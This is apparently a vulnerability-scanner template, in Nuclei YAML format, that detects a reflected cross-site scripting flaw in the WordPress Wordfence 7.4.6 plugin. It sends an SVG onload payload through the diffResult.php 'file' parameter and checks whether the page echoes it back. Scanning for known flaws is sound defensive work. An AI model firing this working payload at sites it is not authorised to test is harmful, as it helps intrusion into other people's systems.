id: wordpress-wordfence-xss

info:
  name: WordPress Wordfence 7.4.6 Cross Site Scripting
  author: madrobot
  severity: medium
  tags: wordpress,wp-plugin,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<svg/onload=alert(1337)>"
        part: body
      - type: word
        words:
          - "text/html"
        part: header